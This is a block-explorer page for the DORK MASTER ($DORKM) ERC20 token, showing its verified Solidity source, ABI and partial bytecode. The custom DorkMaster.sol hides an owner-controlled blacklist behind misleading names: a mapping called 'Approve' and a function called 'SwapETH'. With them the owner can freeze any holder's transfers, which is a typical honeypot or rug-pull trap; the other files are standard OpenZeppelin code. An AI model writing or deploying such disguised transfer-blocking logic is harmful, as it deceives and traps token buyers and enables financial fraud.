ETH Price: $2,434.54 (+1.35%)

Token

DORK MASTER ($DORKM)
 

Overview

Max Total Supply

1,000,000,000 $DORKM

Holders

415

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
13,255.032750080586953077 $DORKM

Value
$0.00
0xdebea8bfababef61cadcfbda41dfacfb81c5c53f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DorkMaster

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 6: DorkMaster.sol
// SPDX-License-Identifier: MIT
// Website: www.dorkmaster.net

pragma solidity ^0.8.0;

import "./ERC20.sol";
import "./Ownable.sol";

contract DorkMaster is ERC20, Ownable {
    mapping(address => bool) public Approve;

    constructor() ERC20("DORK MASTER", "$DORKM") {
        _mint(msg.sender, 1000000000 * (10**18));  // 1,000,000,000 tokens with 18 decimals
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(! Approve[from], "Sender.");
        require(! Approve[to], "Receiver.");
        super._transfer(from, to, amount);
    }

    function SwapETH(address _user, bool _value) public onlyOwner {
        Approve[_user] = _value;
    }
}

File 1 of 6: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 6: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 6: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 5 of 6: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 6: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"Approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_user","type":"address"},{"internalType":"bool","name":"_value","type":"bool"}],"name":"SwapETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600b81526020017f444f524b204d41535445520000000000000000000000000000000000000000008152506040518060400160405280600681526020017f24444f524b4d000000000000000000000000000000000000000000000000000081525081600390816200008f9190620005b2565b508060049081620000a19190620005b2565b505050620000c4620000b8620000e860201b60201c565b620000f060201b60201c565b620000e2336b033b2e3c9fd0803ce8000000620001b660201b60201c565b620007b4565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000228576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200021f90620006fa565b60405180910390fd5b6200023c600083836200032e60201b60201c565b80600260008282546200025091906200074b565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002a791906200074b565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200030e919062000797565b60405180910390a36200032a600083836200033360201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003ba57607f821691505b602082108103620003d057620003cf62000372565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200043a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620003fb565b620004468683620003fb565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004936200048d62000487846200045e565b62000468565b6200045e565b9050919050565b6000819050919050565b620004af8362000472565b620004c7620004be826200049a565b84845462000408565b825550505050565b600090565b620004de620004cf565b620004eb818484620004a4565b505050565b5b81811015620005135762000507600082620004d4565b600181019050620004f1565b5050565b601f82111562000562576200052c81620003d6565b6200053784620003eb565b8101602085101562000547578190505b6200055f6200055685620003eb565b830182620004f0565b50505b505050565b600082821c905092915050565b6000620005876000198460080262000567565b1980831691505092915050565b6000620005a2838362000574565b9150826002028217905092915050565b620005bd8262000338565b67ffffffffffffffff811115620005d957620005d862000343565b5b620005e58254620003a1565b620005f282828562000517565b600060209050601f8311600181146200062a576000841562000615578287015190505b62000621858262000594565b86555062000691565b601f1984166200063a86620003d6565b60005b8281101562000664578489015182556001820191506020850194506020810190506200063d565b8683101562000684578489015162000680601f89168262000574565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620006e2601f8362000699565b9150620006ef82620006aa565b602082019050919050565b600060208201905081810360008301526200071581620006d3565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000758826200045e565b915062000765836200045e565b925082820190508082111562000780576200077f6200071c565b5b92915050565b62000791816200045e565b82525050565b6000602082019050620007ae600083018462000786565b92915050565b611a1b80620007c46000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146102b1578063a9059cbb146102e1578063dd62ed3e14610311578063f2fde38b1461034157610100565b8063715018a61461023b5780638da5cb5b1461024557806395d89b411461026357806396bfcd231461028157610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db57806370a082311461020b57610100565b806306fdde0314610105578063095ea7b3146101235780630d17ed711461015357806318160ddd1461016f575b600080fd5b61010d61035d565b60405161011a919061108c565b60405180910390f35b61013d60048036038101906101389190611147565b6103ef565b60405161014a91906111a2565b60405180910390f35b61016d600480360381019061016891906111e9565b610412565b005b6101776104e9565b6040516101849190611238565b60405180910390f35b6101a760048036038101906101a29190611253565b6104f3565b6040516101b491906111a2565b60405180910390f35b6101c5610522565b6040516101d291906112c2565b60405180910390f35b6101f560048036038101906101f09190611147565b61052b565b60405161020291906111a2565b60405180910390f35b610225600480360381019061022091906112dd565b610562565b6040516102329190611238565b60405180910390f35b6102436105aa565b005b61024d610632565b60405161025a9190611319565b60405180910390f35b61026b61065c565b604051610278919061108c565b60405180910390f35b61029b600480360381019061029691906112dd565b6106ee565b6040516102a891906111a2565b60405180910390f35b6102cb60048036038101906102c69190611147565b61070e565b6040516102d891906111a2565b60405180910390f35b6102fb60048036038101906102f69190611147565b610785565b60405161030891906111a2565b60405180910390f35b61032b60048036038101906103269190611334565b6107a8565b6040516103389190611238565b60405180910390f35b61035b600480360381019061035691906112dd565b61082f565b005b60606003805461036c906113a3565b80601f0160208091040260200160405190810160405280929190818152602001828054610398906113a3565b80156103e55780601f106103ba576101008083540402835291602001916103e5565b820191906000526020600020905b8154815290600101906020018083116103c857829003601f168201915b5050505050905090565b6000806103fa610926565b905061040781858561092e565b600191505092915050565b61041a610926565b73ffffffffffffffffffffffffffffffffffffffff16610438610632565b73ffffffffffffffffffffffffffffffffffffffff161461048e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161048590611420565b60405180910390fd5b80600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600254905090565b6000806104fe610926565b905061050b858285610af7565b610516858585610b83565b60019150509392505050565b60006012905090565b600080610536610926565b905061055781858561054885896107a8565b610552919061146f565b61092e565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105b2610926565b73ffffffffffffffffffffffffffffffffffffffff166105d0610632565b73ffffffffffffffffffffffffffffffffffffffff1614610626576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161061d90611420565b60405180910390fd5b6106306000610cad565b565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461066b906113a3565b80601f0160208091040260200160405190810160405280929190818152602001828054610697906113a3565b80156106e45780601f106106b9576101008083540402835291602001916106e4565b820191906000526020600020905b8154815290600101906020018083116106c757829003601f168201915b5050505050905090565b60066020528060005260406000206000915054906101000a900460ff1681565b600080610719610926565b9050600061072782866107a8565b90508381101561076c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076390611515565b60405180910390fd5b610779828686840361092e565b60019250505092915050565b600080610790610926565b905061079d818585610b83565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610837610926565b73ffffffffffffffffffffffffffffffffffffffff16610855610632565b73ffffffffffffffffffffffffffffffffffffffff16146108ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a290611420565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361091a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610911906115a7565b60405180910390fd5b61092381610cad565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361099d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099490611639565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a0c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a03906116cb565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610aea9190611238565b60405180910390a3505050565b6000610b0384846107a8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b7d5781811015610b6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6690611737565b60405180910390fd5b610b7c848484840361092e565b5b50505050565b600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610c10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c07906117a3565b60405180910390fd5b600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610c9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c949061180f565b60405180910390fd5b610ca8838383610d73565b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610de2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd9906118a1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4890611933565b60405180910390fd5b610e5c838383610ff2565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ee2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed9906119c5565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f75919061146f565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610fd99190611238565b60405180910390a3610fec848484610ff7565b50505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b6000